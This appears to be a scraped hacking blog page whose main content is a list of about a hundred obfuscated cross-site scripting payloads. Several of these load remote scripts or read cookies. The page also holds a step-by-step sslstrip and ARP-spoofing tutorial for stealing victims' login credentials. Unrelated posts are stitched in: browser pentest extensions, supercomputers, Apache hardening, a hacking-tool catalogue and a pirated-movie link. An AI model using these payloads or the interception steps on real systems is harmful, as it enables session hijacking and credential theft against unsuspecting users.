One Hundred Cross-site Scripting Payloads

Unknown Reply 1:02 AM

1) <iframe src=" javascript:prompt(1) ">

2) <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

3) <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

4) <svg><script >alert&lpar;1&rpar; {Opera}

5) <img/src=`` onerror=this.onerror=confirm(1)

6) <form>
<isindex formaction="javascript&colon;confirm(1)"

7) <img src=``&NewLine; onerror=alert(1)&NewLine;

8) <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

9) <script 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

11) <script /**/>/**/alert(1)/**/</script /**/

12) &#34;&#62;<h1/onmouseover='\u0061lert(1)'>

13) <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

14) <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

19) <form>
<a href="javascript:\u0061lert&#x28;1&#x29;">X

20) </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>

21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

22) <form>
<iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

24) http://www.google<script .com>alert(document.location)</script

25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

26) <img/src=@&#32;&#13; onerror = prompt('&#49;')

27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

30) &#00;</form>
<input type&#61;"date" onfocus="alert(1)">

31) <form>
<textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

42) <div/style="width:expression(confirm(1))">X</div>
{IE7}

43) <iframe// src=javaSCRIPT&colon;alert(1)

44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

52) <div onmouseover='alert&lpar;1&rpar;'>
DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

57) <var onmouseover="prompt(1)">On Mouse Over</var>

58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

59) <img src="/" =_=" title="onerror='prompt(1)'">

60) <%<!--'%><script>alert(1);</script -->

61) <script src="data:text/javascript,alert(1)"></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com

68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

69) <svg><script>alert(1)

70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

74) <math><a xlink:href="//jsfiddle.net/t846h/">click

75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script></svg>

83) <script>+-+-1-+-+alert(1)</script>

84) <body onload="&lt;!--&gt;&amp;#10alert(1)">

85) <script itworksinallbrowsers="">/*<script* */alert(1)</script><script>//&NewLine;confirm(1);</script>

88) <svg><script onlypossibleinopera:-=""> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

90) <script x> alert(1) </script> style="x:"&gt;

92)  <-- img="" onerror="alert(1)" src="`"> --!&gt;

93)<script src="&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,alert(1)"></script>

94) <div onclick="alert(1)" onmouseover="prompt(1)" style="height: 100%; left: 0; position: absolute; top: 0; width: 100%;">
x</div>
</--></svg></body>

95) "&gt;<img https:="" onerror="window.open(" src="x" www.google.com="" />

96) <br />
<form>
<button formaction="javascript:alert(1)">CLICKME

97) <math><a href="https://www.blogger.com/null" xlink:href="//jsfiddle.net/t846h/">click

98) <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>

99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

100) <a href="data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203">Click Me</a></a></math></button></form>

Turn Your Chrome Browser Into A Penetration Testing tool





1.Web Developer

The Web Developer extension adds a toolbar button to the browser with various web developer tools. This is the official port of the Web Developer extension for Firefox.

2.d3coder

This extension enables you to encode and decode selected text via the context menu. This reduces the time you spend on looking up encoded values and gives you more time to concentrate on the important things of development. 

3.Site Spider

Use this extension to spider a website looking for dead links. One can restrict the spidering to a directory, a domain, or any other regular expression. The spider can also follow one link beyond this restriction, allowing one to find broken external links.

4.Session Manager

A simple yet powerful extension for managing sets of tabs. Session Manager is a simple yet powerful extension that makes it quick and easy to save, update, remove, and restore sets of tabs.

5.Request Maker

Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages, tamper with the URL, headers and POST data and, of course, make new requests. Request Maker only captures requests sent via HTML forms and XMLHttpRequests; it doesn't fill the log with useless information about images and style sheets.

6.EditThisCookie

EditThisCookie is a cookie manager. You can add, delete, edit, search, protect and block cookies.

7.Cache Killer

This extension allows you to easily disable caching in Chrome. When Cache Killer is activated, it will clean your Browser Cache before every page load. With just one click you can disable or enable this feature.

8.XSS Rays

XSS Rays is a security tool to help pen test large web sites. It's core features include a XSS scanner, XSS Reverser and object inspection. Need to know how a certain page filters output? Don't have the source? No problem. XSS Rays will blackbox reverse a XSS filter without needing the source code.

9.Port Scanner

The Port Scanner extension determines lively services on the host using TCP port interrogations. Port Scanner will check which TCP ports are listening. You can test these ports to see if they are running. It is recommended that any services which are not necessary be disabled. Use Port Scanner to scan individual ports to determine if the device is listening on that port. Port Scanner will analyse given IP address or URL for open ports to help you to secure it.

10.HPP Finder

HPP Finder is a Chrome extension designed for detecting HPP attempts. HPP Finder can detect URLs and HTML forms that might be susceptible of parameter pollution, but it is not a complete solution against HPP. 

Deep Web list links march 2014 (.onion)

Unknown Reply 4:25 PM


10 Useful Firefox Add-ons For Hackers

Unknown 2 2:53 PM
Mozilla Firefox



1.Greasemonkey

Allows you to customise the way a web page displays or behaves, by using small bits of JavaScript.

2.Live HTTP Headers

Check out the HTTP headers of the webpages you're visiting.

3.HackBar

This toolbar will help you in testing sql injections, XSS holes and site security. It is not a tool for executing standard exploits and it will not teach you how to hack a site. Its main purpose is to help a developer do security audits on his code. 

4.Cookies Manager+

View, edit and create new cookies. It also shows extra information about cookies, allows edit multiple cookies at once and backup/restore them.

5.Hide My Ass! Web Proxy

Hide My Ass! operates the most popular browser based web proxy online, the official extension enables you to easily redirect your web traffic through its anonymous proxy network.

6.User Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.

7.Webpage Screenshot in Firefox

FireShot Webpage Screenshots captures webpage screenshot entirely. 

8.Firebug

Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.

9.Firesheep

A Firefox extension that demonstrates HTTP session hijacking attacks.

10.Tamper Data

Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests. Security test web applications by modifying POST parameters.

Source: efytimes.com



8 Most 'Powerful' Supercomputers In The World; Powered by Linux.

Unknown Reply 2:37 PM
Linux
8 Most 'Powerful' Supercomputers In The World; Powered by Linux.

Here's the list :

1. Tianhe-2

Tianhe-2 or TH-2 (literally "Skyriver-2", idiomatically "Milky Way 2") is a 33.86 petaflops supercomputer located in Sun Yat-sen University, Guangzhou, China. It was developed by a team of 1300 scientists and engineers. It is the world's fastest supercomputer according to the TOP500 list for June and November 2013. The development of Tianhe-2 was sponsored by the 863 High Technology Program, initiated by the Chinese government, the government of Guangdong province, and the government of Guangzhou city. It was built by China's National University of Defense Technology (NUDT) in collaboration with the Chinese IT firm Inspur. 

2. K Computer

The K computer is a supercomputer manufactured by Fujitsu, currently installed at the RIKEN Advanced Institute for Computational Science campus in Kobe, Japan. The K computer is based on a distributed memory architecture with over 80,000 computer nodes. It is used for a variety of applications, including climate research, disaster prevention and medical research. The K computer's operating system is based on the Linux kernel, with additional drivers designed to make use of the computer's hardware.

3. IBM Mira

Mira is a petascale Blue Gene/Q supercomputer. It has a performance of 8.16 petaflops and consumes 3.9 MW in power. The supercomputer was constructed by IBM for Argonne National Laboratory's Argonne Leadership Computing Facility with the support of the United States Department of Energy, and partially funded by the National Science Foundation. Mira will be used for scientific research, including studies in the fields of material science, climatology, seismology, and computational chemistry. The supercomputer is being utilised initially for sixteen projects, selected by the Department of Energy.

4. Titan

Titan is a supercomputer built by Cray at Oak Ridge National Laboratory for use in a variety of science projects. Titan is an upgrade of Jaguar, a previous supercomputer at Oak Ridge, that uses graphics processing units (GPUs) in addition to conventional central processing units (CPUs). It is the first such hybrid to perform over 10 petaFLOPS. Titan employs AMD Opteron CPUs in conjunction with Nvidia Tesla GPUs to improve energy efficiency while providing an order of magnitude increase in computational power over Jaguar. It uses 18,688 CPUs paired with an equal number of GPUs to perform at a theoretical peak of 27 petaFLOPS

5. IBM Sequoia

IBM Sequoia is a petascale Blue Gene/Q supercomputer constructed by IBM for the National Nuclear Security Administration as part of the Advanced Simulation and Computing Program (ASC). Record-breaking science applications have been run on Sequoia, the first to cross 10 petaflops of sustained performance. The entire supercomputer runs on Linux, with CNK running on over 98,000 nodes, and Red Hat Enterprise Linux running on 768 I/O nodes that are connected to the filesystem

6. Stampede

Stampede is one of the most powerful machines in the world for open science research. Funded by the National Science Foundation Grant ACI-1134872 and built in partnership with Intel, Dell and Mellanox, Stampede went into production on 7 January, 2013. Stampede comprises 6400 nodes, 102400 cpu cores, 205 TB total memory, 14 PB total and 1.6 PB local storage. The bulk of the cluster consists of 160 racks of primary compute nodes, each with dual Xeon E5-2680 8-core processors, Xeon Phi coprocessor, and 32 GB ram. The cluster also contained 16 nodes with 32 cores and 1 TB ram each, 128 "standard" compute nodes with Nvidia Kepler K20 GPUs, and other nodes for I/O (to a Lustre filesystem), login, and cluster management. Stampede can complete 9.6 quadrillion floating point operations per second.

7. SuperMUC

SuperMUC will be the successor of the Höchstleistungsrechner Bayern II (HLRB II). The SuperMUC will have 18,432 Intel Xeon Sandy Bridge-EP processors running in IBM System x iDataPlex servers with a total of 147,456 cores and a peak performance of about 3 petaFLOPS. The main memory will be 288 terabytes together with 12 petabytes of hard disk space based on the IBM General Parallel File System (GPFS). It will also use a new form of cooling that IBM developed, called Aquasar, that uses hot water to cool the processors, a design that should cut cooling electricity usage by 40 percent, IBM claims.

8. JUQUEEN

JUQUEEN at the Forschungzentrum Jülich is a 28-rack Blue Gene/Q system. It will have a peak performance of about 5,872 Tflops. JUQUEEN runs Red Hat Enterprise Linux.

credits to 
4ntipatika

8 Simple Tips to Secure your Apache Web Server

apache http server

Apache is the most widely used Web server on the Internet. It was developed to work in Unix environment, but was ported to other server operating system like Windows. The Apache web server serves millions of websites and web-applications. A wide range of authentication schemes and a lot of language interfaces support and security features makes it the favorite Web server of millions of users all over the globe.
The stardom and popularity also makes websites that are backed by Apache favorite target among hackers. Websites that are backed by Apache often fall prey for hack attacks not because of security risks and holes in Apache, but mainly because of poorly written code and other security issues associated with Database. Apache and Linux combination provides good security, but things might go wrong if you don’t take the measures. There are several things one need to do to secure Apache. We have compiled a list of simple things you should perform to make you Web server secure.


1. Update
Security holes and potential risks are found and fixed in every Apache release. The developer community is constantly working on new security issues and we can’t stress enough how important it is to update.A good update policy and security policy works hand-in-hand. You should not only update Apache when there is a major release, but also should also install all the patches. It is also wise to update PHP (if you use it) as well when you update Apache.You can check the current version of Apache by using the following command.
# http -vServer version: Apache/2.*.** (Unix)Server built: Mar 12 2014 13:20:23
If it shows that the version of Apache you are running in not up to date, do update.


2. Apache version and OS
If an error occurs, the server might return information about the error along with the Apache version and details about the OS. A simple 404 page can give crucial information about the Web server and OS. In some cases, it might even return details about Apache modules that are also installed in the server.To turn this off, open the config. File (httpd.conf) with a text editor and find the string “ServerSignature On.” It should be On by default. Turn it off simply by replacing “On” by “Off”. Now the HTTP site header and error pages will only show that it runs Apache and will not show the version.


3. Disable Directory Listing
If there is no index file in the root directory, Apache will, by default list all the files in the root directory. There are several ways to prevent Apache from listing the files in the root folder. Again you need to add a couple of lines to the config file. There are 2 ways to doing this. Either set the Option Directive to “-Indexes” or “None.” If you don’t have a clue what we are talking about just add the following lines to the config file.
<directory /var/www/html>Options -IndexesOrder allow,denyAllow from all</directory>
Or use the following code.
<directory></directory>Options NoneOrder allow,denyAllow from all
In some distributions these directive are already set, but it’s better to check, after all better safe than sorry.


4. Secure the config file
If you are a newbie and if you have been following the steps above, you should have conceived the fact that, the httpd.conf file is quite important in keeping your server secure. So it is better to hide your file. You can always unhide it when you want.Use the following command to immunize the config file.
chattr +i /httpd/conf/httpd.conf
From chattr man page:
“A file with the `i’ attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file and no data can be written to the file. Only the superuser or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear this attribute.”

5. Prevent DoS attack by limiting request size
Most Denial of service attacks could be prevented by not allowing large requests. By default the LimitRequestBody is set unlimited. Depending on your website’s requirement the size could be altered. You could also limit requests to more vulnerable directories like upload folders.


6. Disable unwanted Modules
By disabling several modules that are not of any use to you, you can reduce the security vulnerability of your server. To find out the list of all the modules in your Web server, you can use the following command.
# grep LoadModule /etc/httpd/conf/httpd.conf
Analise all the modules in the output list and figure out the ones that are unnecessary. You don’t even have to delete the lines. Just add “#” at the beginning and it will become deactivated after you restart the service.


7. Do not run Apache as root
Apache should not run as root. It is always good to run Apache as a separate user. It will run as daemon or nobody by default. Set up a non-privileged account dedicated for Apache. Never set Apache User or Group to root.
# vi httpd.confGroup apacheUser apache


8. Choose the Right Hosting Provider
This doesn’t have anything to do with fiddling with your Web server. Some of the most popular web hosting services are from the America or Europe. Popular doesn’t mean, highly secure. You don’t necessarily have to buy your web hosting from these hosting providers. If you don’t live in the U.S., you can find a lot of reliable, affordable, and secure hosting providers in your own country. Do you live in Australia? Look for an Australian website hosting provider like EZI Hosting and choose the most popular hosting providers whose IP addresses are not often attacked by hackers.
KEEP SAFE ;)

sslstrip and arpspoofing with Kali linux Tutorial

Kali Linux


Intention/Intro

Educational purposes only.
This tutorial will teach how to ARP Spoof a network and get user information even from websites with that use encryption (HTTPS). This tutorial we’ll use the Kali Linux (Live CD), the sslstrip software, we’ll modify the etter.conf file, add new rules to the iptables and use the ettercap software.

Pre-configurations

The commands below will set the iptables to redirect everything that comes from port 80 to port 10000. Our goal here is to set the sslstrip to strip HTTPS from pages and give to the end user a HTTP page (with no security, no encryption). So, the port that we’ll use to redirect the striped content will be the port 10000.
$echo 1 > /proc/sys/net/ipv4/ip_forward
$iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

Usage

It’s time to run sslstrip and do the tricks that I mentioned before. To run it, use the command below:
$sslstrip -l 10000
Now, open another terminal windows and run the command below:
$ettercap -G
A windows will pop and that’s the ettercap GUI. Click on Sniff > Unifed sniff and choose the interface that you have a internet connection (same as your victims). For exemple, I choose wlan0, but if I’re using a cable, and would’ve choose the eth0 interface. Now click on Host > Scan for hosts. Now click again on Host > Host List. Select your gateway (the IP that you can access your router. It’s usually some IP that ends with 1 [like 192.168.2.1] . Keep in mind that’s not a rule!) and click on the button Target 1. Select the IP that your target is using and click on the button Target 2 (you can select multiples IP’s if you click on them holding the Ctrl or Command key). Now, click on Plugins > Manage Plugins and a list of plugins will appear. Now, double click on dns_spoof and make shore that there’s an asterisk ( * ) by it when you double click it. Now, click on Mitm > Arp spoofing and select the first option that you see in the windows that pop up and click on OK. Now click onStart > Start sniffing. You’re all set! Wait until your target access pages like gmail, facebook, twitter or anything that you have to use credentials. When your target access those sites, the ettercap will show the user and password that your target used. Remember: Thesslstrip is the responsible for making the HTTPS website unsecured! What I’m saying is that the target’s browser will request the page and the server will return a HTTPS page. The sslstrip intercept it on port 10000 and return to the user a HTTP page (no encryption). Beautiful, isn’t it?

Conclusion

This attack is simple to do and very effective. I strongly recommend that you use the Live Kali (instead of installing on your machine or on a VM). I have Kali installed on a computer and it often gives me headache to fix my mistakes. The ettercap might not work if your using a VM. In order to work, you should download/install all the extras VM tools that’s available. The ettercap might not work on a installed Kali. I couldn’t find one reason for that problem yet, but I read that if you uninstall it and install it from the Github resource, it might work better than the one that came with Kali. Warning: To install ettercap from Github, you might face missing libs. It uses a lot of different libs and it will take some time to you get them all installed on your machine. If you want to try to install it, use the commands below:
$sudo apt-get remove ettercap-common ettercap-graphic
$git clone https://github.com/Ettercap/ettercap
$cd ettercap && mkdir build && cmake ../ && make install
Ettercap, sometimes, didn’t work when I pressed the Star Sniffing option. What I did to make it work? Went to the first step of this tutorial and repeated everything.
How can you protect yourself from attacks like this? You could use a software like XArp, create static ARP tables, or you could read this.

Source:http://l33ttutorials.wordpress.com

Diary ng Pangit the movie (Watch Online and free Download)

Unknown Reply 8:56 PM
Diary ng Pangit the Movie

Ang number 1 best-selling book ng 2013, soon to be blockbuster movie ngayong APRIL 2, 2014! This is the OFFICIAL FULL TRAILER of Diary ng Panget The Movie! :)

Starring:
Nadine Lustre as Eya Rodriguez
James Reid as Cross Sandford
Yassi Pressman as Lory Keet
Andre Paras as Chad Jimenez

Directed by Andoy Ranay

Story by Denny aka HaveYouSeenThisGirl

Watch Online -- Click Here (mediafire)
Download Video -- Click Here (mediafire)

Credits to benjr17





Tags:
diary ng pangit the movie, diary ng pangit the movie free download mediafire, diary ng pangit the movie free download no survey, diary ng pangit the movie watch online, diary ng pangit the movie

what is the top 100 Hacking Tools? (must-have)

Unknown 3 2:42 PM
leet shares


Wireless Hacking: These are tools that help you hack into wireless networks. Wireless hacking tools though useful, do not make you a complete hacker. In order to achieve that, you must learn the different ways in which a secure network can be accessed. Also, you should work on making your own network as secure as possible.

1. Aircrack-ng

2. Kismet 

3. inSSIDer

4. KisMAC 

Intrusion Detection Systems: Intrusion detection tools are one of the most important part of any security arrangement. They allow you to detect those threats that are potentially dangerous for your system.

1. Snort 

2. NetCop 

Port Scanners

1. Nmap 

2. Superscan 

3. Angry IP Scanner 

Encryption Tools: In an age where more and more governments are being found spying on their own citizens, encryption is the word of the day. These tools allow you to encrypt your data so that even if someone does get through, they can’t get to the data easily.

1. TrueCrypt 

2. OpenSSH 

3. Putty 

4. OpenSSL 

5. Tor 

6. OpenVPN 

7. Stunnel 

8. KeePass 

Password Crackers: The name is pretty self explanatory in this case. These tools help you recover passwords from the data that a computer system is storing or transmitting over a network.

1. Ophcrack 

2. Medusa 

3. RainbowCrack 

4. Wfuzz 

5. Brutus 

6. L0phtCrack 

7. fgdump 

8. THC Hydra 

9. John The Ripper 

10. Aircrack - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.

11. Cain and Abel 

Packet Crafting: Packet crafting is the technique through which an attacker finds vulnerabilities or entry points within your firewall. These tools help you achieve that more easily.

1. Hping 

2. Scapy 

3. Netcat 

4. Yersinia 

5. Nemesis 

6. Socat 

Traffic Monitoring: These are tools that let you monitor what websites your employees or children are monitoring. 

1. Splunk 

2. Nagios 

3. P0f 

4. Ngrep 

Packet Sniffers: These are tools that can allow you to capture and visualise the traffic that is coming on your website.

1. Wireshark 

2. Tcpdump 

3. Ettercap 

4. dsniff 

5. EtherApe 

Vulnerability Exploitation: These are the tools that you would use in order to gain access to various places.

1. Metasploit 

2. sqlmap 

3. sqlninja 

4. Social Engineer Toolkit 

5. NetSparker 

6. BeEF 

7. Dradis

For 50 more of such free hacking tools, click here

Vulnerability Scanners: These are programs that have been designed to asses a computer or network’s vulnerability to attacks. The functionality of these tools varies from one to the other, but they all present a detailed analysis of how vulnerable your system is.

1. Nessus

2. OpenVAS

3. Nipper

4. Secunia PSI

5. Retina

6. QualysGuard

7. Nexpose

Web Vulnerability Scanners: While vulnerability scanners are meant for your system, web vulnerability scanners assess the vulnerability of web applications. The identify the security vulnerabilities that your app may have through various tests.

1. Burp Suite

2. WebScarab

3. Websecurify

4. Nikto

5. w3af

Web Proxies: Proxies were originally created in order to add encapsulation to distributed systems. The client contacts a proxy server in order to request an item that exists on your server.

1. Paros

2. Fiddler

3. Ratproxy

4. sslstrip

Rootkit Detectors: This tool is a file and directory integrity checker. It verifies if a file is trustworthy and informs the user if found otherwise.

1. AIDE (Advanced Intrusion Detection Environment)

Firewalls: You obviously know what a Firewall is. These monitor and control the traffic in your network, whether incoming or outgoing. They are essential security tools that are used by the most novice to the most advanced users.

1. Netfilter

2. PF: OpenBSD Packet Filter

Fuzzers: The concept of fuzzing is usually put to use in order to test the security vulnerabilities of computer systems or in the software that runs on them.

1. skipfish

2. Wfuzz

3. Wapiti

4. W3af

Forensics: This refers to tools that are used for computer forensic. They are used in order to find evidence that is existing in computer systems.

1. Sleuth Kit

2. Helix

3. Malteg0

4. Encase

Debuggers: These are tools that are used in order to write exploits, reverse engineer binary files and to analyse malware.

1. GDB

2. Immunity Debugger

Hacking Operating Systems: These are operating systems that have been designed specifically for hackers. These distros are preloaded with tools that a hacker needs etc.

1. Backtrack 5r3

2. Kali Linux

3. SELinux

4. Knoppix

5. BackBox Linux

6. Pentoo

7. Matriux Krypton

8. NodeZero

9. Blackbuntu

10. Samurai Web Testing Framework

11. WEAKERTH4N

12. CAINE (Computer Aided Investigative Environment)

13. Bugtraq

14. DEFT

15. Helix

Other Hacking Tools: There are also other miscellaneous hacking tools that are often used by hackers. They can’t be put into a particular category, but they are still quite useful.

1. Netcat

2. Traceroute

3. Ping.eu

4. Dig

5. cURL

Search

Technology & Computers - Top Blogs Philippines

Popular Posts

Categories